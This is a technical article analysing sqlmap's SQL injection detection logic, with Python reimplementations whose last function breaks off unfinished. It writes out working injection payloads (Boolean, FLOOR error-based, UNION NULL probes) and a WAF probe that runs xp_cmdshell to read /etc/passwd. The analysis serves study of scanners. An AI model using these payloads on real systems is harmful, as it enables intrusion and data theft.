Author: Phoenix @ Anheng scanner
Preface
The sqlmap analyzed in this paper is the version at commit 591a60bbde434aacc0d90548cd442d6a756ff104, from July 2017. It is somewhat older than the current release, but the core detection logic of sqlmap has not changed in substance, so the analysis and summary below are based on that source.
This paper analyzes sqlmap's vulnerability detection process from five aspects: the preliminary requests (a series of probe requests), Boolean-based blind injection, error-based injection, UNION injection and time-based blind injection. It also analyzes in detail the two basic detection algorithms on which these rest, which is the main point of the paper: response similarity comparison, and Gaussian-distribution-based recognition of the response mechanism. Response similarity comparison is used throughout sqlmap; the Gaussian-distribution mechanism is used in UNION injection (the SELECT NULL column-count detection) and in time-based blind injection.
This article contains a large number of flow charts, and the text can only explain the steps I consider key. This may not be friendly to readers who are not familiar with automated SQL injection detection, but if you study the flow charts carefully, think about them and search for what is unclear, I believe you will understand them.
Preliminary requests in sqlmap detection
Before sqlmap tests a parameter for SQL injection, it sends a series of preliminary requests, mainly for:
- Website connectivity check
- WAF detection
- Page stability check
- Parameter dynamicity check
- Heuristic injection check
- False-positive check
and so on. Strictly speaking, the false-positive check is not a preliminary step: it is used inside time-based and Boolean-based blind injection, with the same logic in both, so its logic is described here once and the actual requests are shown in the time-based and Boolean-based sections.
In sqlmap, response similarity comparison is built into the request engine itself, which shows how central it is: part of the logic of these preliminary requests cannot do without it. In the industry the term "web page similarity comparison" is common; in this paper it refers to the comparison of HTTP response bodies that forms part of response similarity comparison. So before analyzing the preliminary requests, first look at sqlmap's response similarity comparison.
Response similarity comparison
Throughout sqlmap's detection there is the notion of the original response: during the website connectivity check, if the target responds successfully, that response (status code, HTTP response headers and HTTP response body) is stored as the original response.
The original response is the reference object in every later comparison. After a request succeeds, its response is compared with the original response to obtain a comparison result; the process is shown in the following figure.
The input of the comparison algorithm is the current complete response (status code, HTTP response headers and HTTP response body). The output is either the page similarity ratio or a Boolean value, whichever the caller needs. A Boolean output of true means the current response is similar to the original response; false means it is not. The relation between the similarity ratio and the similarity Boolean value of two responses is shown in the figure below.
The ratio is a value between 0 and 1. In sqlmap, a ratio below 0.02 (the lower bound) gives false and a ratio above 0.98 (the upper bound) gives true. Between 0.02 and 0.98, the result is true when the ratio is greater than kb.matchRatio (the critical point stored in the knowledge base) plus the tolerance (0.05 by default), and false otherwise. In this middle range the key problem is how the critical point is determined.
The critical point is determined in one of two ways:
- A pair of true/false payloads in Boolean-based blind injection
- All other cases
How the critical point is determined in Boolean-based blind injection is explained in that section below; the second case is explained here. In the second case, two conditions must both hold for the critical point to be set:
- The response is evaluated with response similarity comparison
- Its ratio is the first one observed that lies between 0.02 and 0.98
That ratio then becomes the critical point and is kept for the rest of the run. The term "web page similarity" that appears later in this paper refers to the HTTP body comparison inside response similarity comparison.
Response similarity comparison is a basic building block used throughout sqlmap's detection. Before introducing the preliminary requests, the injection environment is described briefly, and each step is then explained with the actual requests sent, which should make it easier to follow.
Injection scenario
Suppose example.php contains an injection point and also prints a random string:
$query = "SELECT * FROM users WHERE id=" . $_GET['id'] . " LIMIT 0, 1";
print "<br>static line<br>";
print str_rand(rand(10,20));
So every response ends with a random string of 10 to 20 characters. The request for the injection point is:
http://target_host/example.php?id=1
Suppose the MySQL table contains two records:
+----+--------+---------+
| id | name   | surname |
+----+--------+---------+
|  1 | luther | blisset |
|  2 | fluffy | bunny   |
+----+--------+---------+
example.php responds with the record whose id equals the value x, and PHP error display is turned on.
With this, the injection environment is set up.
Website connectivity check
The purpose of this request is to check that the website is reachable; the flow chart is as follows:
The response of the connectivity check is stored as the original response (used by response similarity comparison) and as the page template (used by the page stability check).
In the scenario above, the request sent is:
WAF detection
The purpose of this request is to detect whether the website is protected by a WAF; the flow chart is as follows:
Based on the original request, sqlmap adds a new parameter carrying the WAF probe payload, whose value is
AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
A payload like this usually triggers a WAF. When sqlmap finds that the similarity between this response and the original response is below 0.5, it concludes that a WAF is present.
In the scenario above (no WAF), the request sent is:
Page stability check
The purpose of this request is to check whether the page is stable; the flow chart is as follows:
During the stability check, if the same request produces different responses, the dynamic content is identified automatically, and in every later response similarity comparison that dynamic content is removed before the comparison is made.
The stability check loops over dynamic-content detection and does not move on until the dynamic content has been identified stably. When sqlmap identifies the dynamic parts of a page, they are not accumulated incrementally: each time the page is requested again, the dynamic parts are recalculated and the previous ones discarded.
In the scenario above, the requests sent are:
In this environment the stability check sends two requests: the first to identify the dynamic content, the second to verify that the identification is effective. For a dynamic response, the stability check can only work once the dynamic content has been identified accurately.
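The two building blocks described so far, dynamic-content removal from the stability check and the similarity decision with its 0.02 / 0.98 bounds, critical point and 0.05 tolerance, fit in one short reimplementation. The following is an added example, not sqlmap's own code: the constants mirror sqlmap's settings, but the KnowledgeBase class, the page bodies and the random strings are constructed for the example.

```python
# Added example, not sqlmap's own code: a reduced reimplementation of
# dynamic-content removal and of the similarity decision described above.
# Constants mirror sqlmap's settings; the class and page bodies are constructed.
import difflib
import re

LOWER_RATIO_BOUND = 0.02            # below this: never similar
UPPER_RATIO_BOUND = 0.98            # above this: always similar
DIFF_TOLERANCE = 0.05               # added to the critical point in between
DYNAMICITY_BOUNDARY_LENGTH = 20     # length of the static prefix/suffix kept


class KnowledgeBase:
    """Stand-in for sqlmap's kb object, holding only what this example needs."""

    def __init__(self):
        self.matchRatio = None      # the critical point, set once per run
        self.dynamicMarkings = []   # (prefix, suffix) pairs around dynamic text


def find_dynamic_content(first_page, second_page):
    """Diff two responses to the same request; every gap between two long
    matching blocks is dynamic, and the static text around it is recorded."""
    matcher = difflib.SequenceMatcher(None, first_page, second_page)
    # Short matching blocks (and the trailing zero-size block) are ignored:
    # they are coincidental matches inside the dynamic text.
    blocks = [b for b in matcher.get_matching_blocks()
              if b.size > 2 * DYNAMICITY_BOUNDARY_LENGTH]
    markings = []
    padded = [None] + blocks + [None]
    for left, right in zip(padded, padded[1:]):
        if left is None and right is None:
            continue
        if left is None and right.a == 0:
            continue                # page starts with static content
        if right is None and left.a + left.size >= len(first_page):
            continue                # page ends with static content
        prefix = first_page[left.a:left.a + left.size][-DYNAMICITY_BOUNDARY_LENGTH:] if left else None
        suffix = first_page[right.a:right.a + right.size][:DYNAMICITY_BOUNDARY_LENGTH] if right else None
        markings.append((prefix, suffix))
    return markings


def remove_dynamic_content(page, markings):
    """Collapse every dynamic region to its static boundaries."""
    for prefix, suffix in markings:
        if prefix is None:
            page = re.sub("(?s)^.+" + re.escape(suffix), lambda m: suffix, page)
        elif suffix is None:
            page = re.sub("(?s)" + re.escape(prefix) + ".+$", lambda m: prefix, page)
        else:
            page = re.sub("(?s)" + re.escape(prefix) + ".+" + re.escape(suffix),
                          lambda m: prefix + suffix, page)
    return page


def compare(kb, original_page, page, get_ratio=False):
    """sqlmap-style decision: is `page` similar to the original response?
    The first ratio seen between the bounds becomes the critical point."""
    cleaned_original = remove_dynamic_content(original_page, kb.dynamicMarkings)
    cleaned_page = remove_dynamic_content(page, kb.dynamicMarkings)
    ratio = difflib.SequenceMatcher(None, cleaned_original, cleaned_page).quick_ratio()
    if get_ratio:
        return ratio
    if kb.matchRatio is None and LOWER_RATIO_BOUND <= ratio <= UPPER_RATIO_BOUND:
        kb.matchRatio = ratio
    if ratio > UPPER_RATIO_BOUND:
        return True
    if ratio < LOWER_RATIO_BOUND:
        return False
    return ratio > kb.matchRatio + DIFF_TOLERANCE


# Constructed responses for the scenario on this page: a static page with a
# made-up random string after "static line<br>".
STATIC_HEAD = '<html><body><h1>User 1: luther blisset</h1><br>static line<br>'
STATIC_TAIL = '</p><div class="footer">Copyright example.org, all rights reserved</div></body></html>'
ORIGINAL_PAGE = STATIC_HEAD + 'xK3pQ9mZr2aBwT' + STATIC_TAIL
SECOND_PAGE = STATIC_HEAD + 'Vt7wLp0cNe4' + STATIC_TAIL
FALSE_PAGE = STATIC_HEAD.replace('User 1: luther blisset', '') + 'hG5sD8' + STATIC_TAIL


def demo():
    """Stability check, then the false/true comparison of the Boolean case."""
    kb = KnowledgeBase()
    kb.dynamicMarkings = find_dynamic_content(ORIGINAL_PAGE, SECOND_PAGE)
    false_similar = compare(kb, ORIGINAL_PAGE, FALSE_PAGE)   # sets the critical point
    true_similar = compare(kb, ORIGINAL_PAGE, SECOND_PAGE)   # same page, new random string
    return kb.dynamicMarkings, kb.matchRatio, false_similar, true_similar


if __name__ == "__main__":
    print(demo())
```

The order of calls in demo() matters: the first in-range ratio (the page without the record) fixes the critical point, and only then does the re-requested original page, identical once the random string is stripped, come out as similar. If the stability check were skipped, the random string alone would pull every ratio below 1 and the critical point would be set by noise rather than by the database result.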
Parameter dynamicity check
The purpose of this request is to check whether the parameter is dynamic, that is, whether changing its value changes the response; the flow chart is as follows:
sqlmap tests with two four-digit random numbers. If a parameter turns out not to be dynamic, testing it can in some cases be skipped, which is very effective in batch testing.
Repeated requests
During the parameter dynamicity check sqlmap generates the random number twice and sends a request each time, which looks like a repeated request. I was puzzled by this, so I asked the sqlmap author on GitHub; the answer is here: https://github.com/sqlmapproject/sqlmap/issues/3304.
There are many places in sqlmap where the same logic sends repeated requests, including but not limited to the true/false logic in the false-positive check and the check at the end of UNION injection of whether the injection point supports multi-row output. I think the likely reason is to send more packets to avoid false positives, or to obtain more information about the environment (UNION injection and multi-row injection).
In the scenario above, the requests sent by the parameter dynamicity check are:
Heuristic injection check
This request tries to make the web application raise an error, in order to find out whether the parameter is a possible injection point; the flow chart is as follows:
The heuristic payload is a string of 10 characters drawn at random from the six characters ' " ( ) , . with the constraint that it contains a single quote. The purpose of the heuristic check is to make the web application error out: if error display is enabled, the DBMS can be identified quickly by regex matching of the error message.
The figure above shows the core logic of the heuristic check. There are further requests for type casting, a simple XSS test and so on, but I do not consider them core logic, and they are too complex to be drawn in the figure.
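The heuristic check reduces to two parts: the 10-character payload and a regex scan of the response for a DBMS error that was not already on the original page. The following is an added example, not sqlmap's own code; the alphabet is sqlmap's, but the signature table is a small constructed subset (not sqlmap's errors.xml) and both response bodies are constructed.

```python
# Added example, not sqlmap's own code: the heuristic check reduced to the
# payload over sqlmap's six-character alphabet (must contain a single quote)
# and a scan for a DBMS error signature absent from the original page.
# The signature table and the responses are constructed for this example.
import random
import re

HEURISTIC_CHECK_ALPHABET = ('"', "'", ')', '(', ',', '.')

# Constructed subset of well-known error strings, keyed by DBMS.
DBMS_ERROR_SIGNATURES = {
    "MySQL": [r"You have an error in your SQL syntax", r"Warning.*\Wmysqli?_"],
    "PostgreSQL": [r"PostgreSQL.*ERROR", r"Warning.*\Wpg_"],
    "Microsoft SQL Server": [r"Unclosed quotation mark after the character string"],
    "Oracle": [r"\bORA-\d{5}"],
}


def heuristic_payload(rng=random):
    """Random 10-character string over the alphabet, regenerated until it
    contains a single quote: the quote is what breaks a quoted SQL literal."""
    payload = ""
    while "'" not in payload:
        payload = "".join(rng.choice(HEURISTIC_CHECK_ALPHABET) for _ in range(10))
    return payload


def identify_dbms_error(page, original_page=""):
    """Return the DBMS whose error signature appears in `page` but not in the
    original page.  Filtering against the original page avoids taking an
    error string that is always on the page as evidence of injection."""
    for dbms, patterns in DBMS_ERROR_SIGNATURES.items():
        for pattern in patterns:
            if (re.search(pattern, page, re.I | re.S)
                    and not re.search(pattern, original_page, re.I | re.S)):
                return dbms
    return None


# Constructed responses: the original page, and the page returned when the
# heuristic payload is appended to id=1 with PHP error display enabled.
ORIGINAL_PAGE = ("<html><body><h1>User 1: luther blisset</h1><br>static line<br>"
                 "kq3Zp9</body></html>")
ERROR_PAGE = ("<html><body><b>Warning</b>: mysql_fetch_array(): supplied argument is not "
              "a valid MySQL result resource in <b>/var/www/example.php</b> on line <b>7</b>"
              "<br><br>static line<br>xT7mQ2</body></html>")


def run_heuristic(rng=random):
    """Build the probe value for id and classify the constructed responses."""
    probe_value = "1" + heuristic_payload(rng)          # e.g. 1'\"(),.)('
    return (probe_value,
            identify_dbms_error(ERROR_PAGE, ORIGINAL_PAGE),      # "MySQL"
            identify_dbms_error(ORIGINAL_PAGE, ORIGINAL_PAGE))   # None


if __name__ == "__main__":
    print(run_heuristic())
```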
In the scenario above, the request sent is:
False-positive check
In Boolean-based blind injection, response similarity analysis decides whether an injection point exists; in time-based blind injection, the Gaussian algorithm decides. Both methods can produce false positives, so sqlmap adds a false-positive check mechanism. The following figure is its flow chart:
In the false-positive check, three numbers are combined into different true and false expressions, so that the payload actively controls the response and the existence of the injection is judged from whether each response behaves as expected. Building these payloads uses the <vector> tag of the sqlmap test vector, which is analyzed in detail in the Boolean-based and time-based blind injection sections below.
The actual requests of the false-positive check are also shown and analyzed in those two sections.
Boolean-based blind injection in sqlmap detection
Main process of Boolean-based blind injection
The figure above is the flow chart of Boolean-based blind injection. Above the dotted line is the preliminary request process; below the dotted line is the loop of requests for each injection point.
In the preliminary part of Boolean-based blind injection you can see the target stability check, in which sqlmap finds the dynamic parts of the page and uses them in all later response similarity analysis.
Response similarity analysis is used heavily in Boolean-based blind injection. As the flow chart shows, the first thing sqlmap does in the loop for each injection point is to clear the critical point. In Boolean-based blind injection the critical point is determined while sending the pair of true/false packets (the logically false packet is sent first, then the logically true one): if the ratio calculated for one of these packets lies between 0.02 and 0.98, that ratio becomes the critical point.
After the regular response similarity analysis, sqlmap also performs an injection judgment with HTML tags removed. I believe this targets the case where the response contains a large amount of HTML markup while the data that changes with the database result is small. In that step response similarity analysis is no longer used; instead a set operation (the difference between the sets of text fragments of the true and false responses) is used to decide whether the injection exists.
The false-positive check logic was described in the preliminary section; the analysis below covers the requests in the vulnerable environment.
Analysis of a Boolean-based blind injection case
The Boolean-based blind injection case is analyzed in the vulnerable scenario above.
First, the original request:
example.php?id=1
The test vector that injects successfully:
<test>
<title>AND boolean-based blind - WHERE or HAVING clause</title>
...
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
According to the test vector, [RANDNUM]=[RANDNUM1] is filled with two different random numbers. The logically false packet generated is:
example.php?id=1 AND 8858=3197
After sending this first logically false packet, sqlmap calculates the page similarity. With the dynamic random string removed, the similarity between the false page and the original page is 0.787, so the page is not similar to the original page. This similarity value is set as the critical point for this test vector. The default tolerance in sqlmap is 0.05, so from now on a response whose page similarity is greater than 0.837 (0.787 + 0.05) is considered similar to the original page, and otherwise not similar.
According to the test vector, [RANDNUM]=[RANDNUM] is filled with one random number. The logically true packet generated is:
example.php?id=1 AND 1293=1293
After sending the logically true request, sqlmap receives the response and calculates the page similarity. Here it is 1 (random string removed), which is greater than 0.837, so the logically true response is similar to the original response.
Two more random numbers are generated for [RANDNUM]=[RANDNUM1], giving the confirmation false packet:
example.php?id=1 AND 2560=4847
After removing the random string, the page similarity is 0.787, so the page is not similar to the original page. At this point sqlmap believes the injection exists and enters the false-positive check phase.
In the Boolean-based false-positive check, three different numbers are generated and combined into different expressions. Each expression replaces the original logic in the test vector, and sqlmap observes whether the response is as expected. Looking back at the test vector, it contains a <vector> tag, and the [INFERENCE] in that tag is where the expressions built from the three numbers are substituted.
Following the false-positive flow chart, there are five checks. The first:
example.php?id=1 AND 25=25
The page similarity is 1, similar to the original page. The second:
example.php?id=1 AND 25=83
The page similarity is 0.787, not similar to the original page. The third:
example.php?id=1 AND 83=53
The page similarity is 0.787, not similar to the original page. The fourth:
example.php?id=1 AND 53=53
The page similarity is 1, similar to the original page. The fifth (a deliberately invalid expression):
example.php?id=1 AND 83 53
The page similarity is 0.603, not similar to the original page. The false-positive check is complete and the injection is confirmed.
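The five checks above can be written once against an abstract oracle, so that the same function serves the Boolean-based case (oracle = page similarity) and the time-based case later in this paper (oracle = response delay). The following is an added example, not sqlmap's own code: the vector templates are the ones quoted on this page, the number triple is the one from the case, and the two oracles are constructed simulations of a target rather than network code.

```python
# Added example, not sqlmap's own code: the five-step false-positive check
# against an abstract oracle, usable for both Boolean-based and time-based
# blind injection.  Oracles are constructed simulations, not network code.
import random
import re


def pick_three(rng=random):
    """Three distinct numbers r1 < r2 < r3 (two-digit, as in the case)."""
    while True:
        r1, r2, r3 = (rng.randint(11, 99) for _ in range(3))
        r1, r3 = min(r1, r2, r3), max(r1, r2, r3)
        if r3 > r2 > r1:
            return r1, r2, r3


def false_positive_expressions(triple):
    """The expressions substituted for [INFERENCE], with the expected verdict."""
    r1, r2, r3 = triple
    return [
        ("%d=%d" % (r1, r1), True),    # must evaluate true
        ("%d=%d" % (r1, r3), False),   # must evaluate false
        ("%d=%d" % (r3, r2), False),   # must evaluate false
        ("%d=%d" % (r2, r2), True),    # must evaluate true
        ("%d %d" % (r3, r2), False),   # invalid SQL: must not read as true
    ]


def check_false_positives(evaluate, triple):
    """True if every expression yields the expected verdict, i.e. the
    injection point really reacts to the logic we inject."""
    return all(evaluate(expression) is expected
               for expression, expected in false_positive_expressions(triple))


def boolean_vector(expression):
    """<vector>AND [INFERENCE]</vector> of the Boolean-based test vector."""
    return "AND %s" % expression


def time_vector(expression, randnum, sleeptime):
    """<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>."""
    return "AND %d=IF((%s),SLEEP(%d),%d)" % (randnum, expression, sleeptime, randnum)


_EQUALITY = re.compile(r"^(\d+)=(\d+)$")


def injectable_oracle(expression):
    """Simulates a genuinely injectable target: the DBMS evaluates the
    expression, and malformed SQL produces an error page (read as false)."""
    m = _EQUALITY.match(expression)
    return bool(m) and m.group(1) == m.group(2)


def noisy_oracle(expression):
    """Simulates a false positive: the page looks 'true' whatever is sent,
    as a sluggish server that delays every response would."""
    return True


if __name__ == "__main__":
    triple = (25, 53, 83)                      # the numbers from the case
    for expression, expected in false_positive_expressions(triple):
        print(boolean_vector(expression), expected)
    print(check_false_positives(injectable_oracle, triple))   # True
    print(check_false_positives(noisy_oracle, triple))        # False
```

The malformed fifth expression is the one that catches the noisy oracle: a target that answers "true" to `83 53` cannot be evaluating what we inject, so whatever made the earlier true/false pair look different was not the database.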
Error-based injection in sqlmap detection
Main process of error-based injection
The figure above is the flow chart of error-based injection. Above the dotted line is the preliminary request process; below the dotted line is the loop of requests for each injection point.
sqlmap's error-based injection is not simply making the database server raise an error that gets echoed: sqlmap controls the content of the SQL error. The essence of error-based injection is the payload, and the response to each payload packet is matched with an exact regular expression. When the match succeeds, the payload contains a value that can only appear in the response if the injected SQL was actually executed; the case analysis below shows this in detail.
Because error-based recognition relies on regex matching, a response that matches normally cannot be a false positive, so no false-positive check is needed.
Case study of error-based injection
The error-based injection case is analyzed in the vulnerable scenario above.
First, the original request:
example.php?id=1
The test vector that injects successfully:
<test>
<title>MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
...
<request>
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
</request>
<response>
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version> >= 5.0</dbms_version>
</details>
</test>
According to the test vector, [RANDNUM], [DELIMITER_START] and [DELIMITER_STOP] are replaced as needed. The generated packet is:
example.php?id=1 AND (SELECT 4229 FROM(SELECT COUNT(*),CONCAT(0x7176707871,(SELECT (ELT(4229=4229,1))),0x7176627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
From the packet, the placeholder values are:
[RANDNUM]: 4229
[DELIMITER_START]: 0x7176707871 in the payload, which appears in the echoed error as qvpxq
[DELIMITER_STOP]: 0x7176627671 in the payload, which appears in the echoed error as qvbvq
sqlmap's error-based injection controls the SQL error so that the injected value is output inside it:
<b>SQL error:</b> Duplicate entry 'qvpxq1qvbvq1' for key 'group_key'<br>
For such an error, the regular expression in the test vector, [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] (with the delimiters substituted), extracts exactly the value 1 between the two delimiters. At this point error-based injection is confirmed.
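Instantiating the FLOOR test vector and applying its <grep> regex to the response is the whole of error-based detection; the following added example (not sqlmap's own code) does both. The template is the payload quoted above, the delimiter shape ('q', three letters, 'q', sent as a hex literal) follows the packet in the case, and the two error pages are constructed from the one shown above.

```python
# Added example, not sqlmap's own code: instantiating the FLOOR test vector
# quoted above and applying its <grep> regex to the response.  Delimiter
# shape follows the packet in the case; the error pages are constructed.
import random
import re
import string

PAYLOAD_TEMPLATE = ("AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',"
                    "(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x "
                    "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)")
GREP_TEMPLATE = "[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]"


def random_delimiter(rng=random):
    """A marker unlikely to occur on the page by chance, e.g. qvpxq."""
    return "q" + "".join(rng.choice(string.ascii_lowercase) for _ in range(3)) + "q"


def hex_literal(text):
    """MySQL hex string literal, so the payload needs no quote characters."""
    return "0x" + text.encode("ascii").hex()


def build_payload(randnum, start, stop):
    """Fill the placeholders; the quoted delimiters become hex literals."""
    payload = PAYLOAD_TEMPLATE.replace("[RANDNUM]", str(randnum))
    payload = payload.replace("'[DELIMITER_START]'", hex_literal(start))
    payload = payload.replace("'[DELIMITER_STOP]'", hex_literal(stop))
    return payload


def extract_result(page, start, stop):
    """Apply the <grep> regex.  None means the error, if any, was not the one
    our payload forced, so nothing is reported: this is why error-based
    detection needs no separate false-positive check."""
    pattern = (GREP_TEMPLATE.replace("[DELIMITER_START]", re.escape(start))
                            .replace("[DELIMITER_STOP]", re.escape(stop)))
    match = re.search(pattern, page, re.S)
    return match.group("result") if match else None


# Constructed responses: the forced duplicate-key error from the case, and a
# generic syntax error that carries no delimiters.
FORCED_ERROR_PAGE = "<b>SQL error:</b> Duplicate entry 'qvpxq1qvbvq1' for key 'group_key'<br>"
UNRELATED_ERROR_PAGE = "<b>SQL error:</b> You have an error in your SQL syntax<br>"


def demo():
    start, stop = "qvpxq", "qvbvq"          # the delimiters from the case
    payload = build_payload(4229, start, stop)
    return (payload,
            extract_result(FORCED_ERROR_PAGE, start, stop),      # "1"
            extract_result(UNRELATED_ERROR_PAGE, start, stop))   # None


if __name__ == "__main__":
    print(demo())
```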
UNION injection in sqlmap detection
Main process of UNION injection
The figure above is the flow chart of UNION injection. Above the dotted line is the preliminary request process; below the dotted line is the loop of requests for each injection point.
UNION injection is the most complex of the four detection techniques. It contains three sub-techniques:
- ORDER BY column-count detection
- SELECT NULL column-count detection
- SELECT NULL string-position determination
each with its own fairly involved process and algorithm. The preliminary part of pure UNION injection has no stability check, which means that in pure UNION injection dynamic content is not stripped before the page similarity comparison.
UNION injection has two steps. The first is to determine the number of columns: ORDER BY column-count detection is the main method and SELECT NULL column-count detection the supplement, and together they form the column-count determination. The second step, once the column count is known, is to find a column that is a string field, so that database data can be reflected through that column.
Because UNION recognition relies on regex matching, a response that matches normally cannot be a false positive, so no false-positive check is needed.
ORDER BY column-count detection
ORDER BY column-count detection relies on page similarity comparison and a binary search. If the response to ORDER BY 1 is similar to the original page and the response to ORDER BY 1000 (a random four-digit number) is not, the ORDER BY technique can be used to determine the column count.
SELECT NULL column-count detection
SELECT NULL column-count detection relies on page similarity comparison and the Gaussian (normal) distribution. The explanation below is best read together with the case analysis.
When SELECT NULL column-count detection runs, it first fixes the minimum and maximum column counts to guess (the minimum is 1, the maximum is 10). sqlmap sends the 10 packets, from 1 NULL to 10 NULLs, together. After the 10 responses are received, page similarity analysis is carried out and the 10 page similarity values are obtained (as ratios, not true/false). Among these 10 values, if a column count was guessed successfully, the similarity of the successful response can only be the maximum or the minimum. Removing the maximum and the minimum leaves 8 values, which can be taken as responses of unsuccessful guesses. A Gaussian distribution is fitted to these 8 values, giving a model of the unsuccessful guesses. The maximum or the minimum is then checked against this model: if it conforms, it too is the response of an unsuccessful guess; if it does not, it is the response of the successful guess.
The Gaussian distribution is used here as an anomaly detection algorithm. Some key points for understanding it:
- Why use an anomaly detection algorithm
A website's response follows its processing logic. If a group of requests is processed by the same logic, the responses are almost the same. If one response changes, the processing logic has changed, and this change may be a successful injection, because in a group of requests only one can succeed; that point can be treated as an anomaly.
- The modeling idea
In UNION injection only the page similarity is used as the modeled (Gaussian) variable, so the outlier can only be the maximum or the minimum. After removing those two candidates, the remaining data come from one logic (unsuccessful injection), and the Gaussian model is fitted to that unsuccessful data. (This is also why SELECT NULL column guessing needs a minimum span of column counts: too little data cannot be modeled, and the more data, the more accurate the model.) The resulting model is the model of unsuccessful injection: data that obey the model are, with overwhelming probability, unsuccessful, and data that do not obey the distribution (outliers) are the successful injection.
- Why similarity is the only independent variable of the Gaussian model in UNION injection
UNION injection is an injection whose result is reflected in the response, so the response text is the most obvious basis for judging it. Because a page contains a lot of noise such as uncontrollable advertisements, using similarity to judge the page content is convenient and reasonable for a machine. By contrast, for time-based injection, using the response time as the modeled variable is more reasonable.
- What the seven standard deviations represent
Seven standard deviations split the data into two groups here, meaning that the two groups were generated by different mechanisms. In this case the website's processing logic differs: one group is where the SQL statement executed successfully, the other where it did not.
SELECT NULL string-position determination
SELECT NULL string-position determination relies on regex matching and is the part of UNION injection that needs no false-positive check. If no string position can be found, sqlmap automatically substitutes a number for the NULL in the payload and changes how the payload is assembled (the parameter value is changed to a negative number before the payload is appended), so that the specified number is sure to be reflected in the response.
Case study of UNION injection
The UNION injection case is analyzed in the vulnerable scenario above.
First, the original request:
example.php?id=1
The test vector that injects successfully:
<test>
<title>Generic UNION query (NULL) - 1 to 10 columns</title>
...
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
</test>
Ten packets, with 1 to 10 NULL columns, are sent. The first packet:
example.php?id=1 UNION ALL SELECT NULL-- fVTK
The page similarity of this packet is 0.714. The second packet:
example.php?id=1 UNION ALL SELECT NULL,NULL-- jmEt
The page similarity of this packet is 0.726. The third packet:
example.php?id=1 UNION ALL SELECT NULL,NULL,NULL-- cRud
The page similarity of this packet is 0.834. The fourth packet:
example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL-- AqEV
The page similarity of this packet is 0.716. The fifth packet:
example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- NvIh
The page similarity of this packet is 0.71. The sixth packet:
example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- qrAS
The page similarity of this packet is 0.723. The seventh packet:
example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- mmxs
The page similarity of this packet is 0.724. The eighth packet:
example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- moNa
The page similarity of this packet is 0.723. The ninth packet:
example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vHbn
The page similarity of this packet is 0.725. The tenth packet:
example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bVyF
The page similarity of this packet is 0.722.
Ten page similarity values are obtained; the maximum is 0.834 and the minimum is 0.71. After removing the maximum and the minimum, the remaining eight values have a mean of 0.721625 and a (sample) standard deviation of 0.00430738568375.
- Upper bound = mean + 7 * standard deviation = 0.751776699786
- Lower bound = mean - 7 * standard deviation = 0.691473300214
A page similarity above the upper bound or below the lower bound means the column count has been found. 0.834 is above the upper bound, and the number of NULLs in its packet is the column count: 3. The column count has been detected.
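Both column-count techniques, ORDER BY with a binary search and SELECT NULL with the seven-standard-deviation rule, are short enough to show in one piece; the second is run over the ten similarity values of the case and reproduces the mean, deviation and bounds above. This is an added example, not sqlmap's own code: the two constants mirror sqlmap's settings, and the ORDER BY oracle is a constructed simulation of a three-column target rather than a request to a server.

```python
# Added example, not sqlmap's own code: ORDER BY column counting by binary
# search over an oracle, and SELECT NULL column counting by the 7-sd outlier
# rule over the case's ten similarity values.  Oracles are constructed.
import random
import statistics

ORDER_BY_STEP = 10          # sqlmap's ORDER_BY_STEP
UNION_STDEV_COEFF = 7       # sqlmap's UNION_STDEV_COEFF


def order_by_column_count(page_similar, lower=1, upper=ORDER_BY_STEP, rng=random):
    """Largest n for which ORDER BY n still returns a page similar to the
    original.  page_similar(n) is the oracle.  Returns None when the
    precondition fails (ORDER BY 1 must work and a random four-digit column
    number must not), because then the page does not react to ORDER BY."""
    if not page_similar(1) or page_similar(rng.randint(1000, 9999)):
        return None
    while page_similar(upper):              # widen until ORDER BY upper breaks
        lower, upper = upper, upper + ORDER_BY_STEP
    while upper - lower > 1:                # bisect: lower works, upper fails
        mid = (lower + upper) // 2
        if page_similar(mid):
            lower = mid
        else:
            upper = mid
    return lower


def union_null_column_count(ratios):
    """ratios[i] is the page similarity of the payload with i+1 NULLs.
    Fit a Gaussian to everything but the max and the min; the max (or min)
    is the successful guess only if it lies beyond mean +/- 7 sd.
    Returns (column_count_or_None, (mean, sd, lower, upper))."""
    if len(ratios) < 4:
        raise ValueError("need at least four column guesses to model the misses")
    ordered = sorted(ratios)
    lowest, highest, rest = ordered[0], ordered[-1], ordered[1:-1]
    mean = statistics.mean(rest)
    sd = statistics.stdev(rest)             # sample sd, as sqlmap's stdev()
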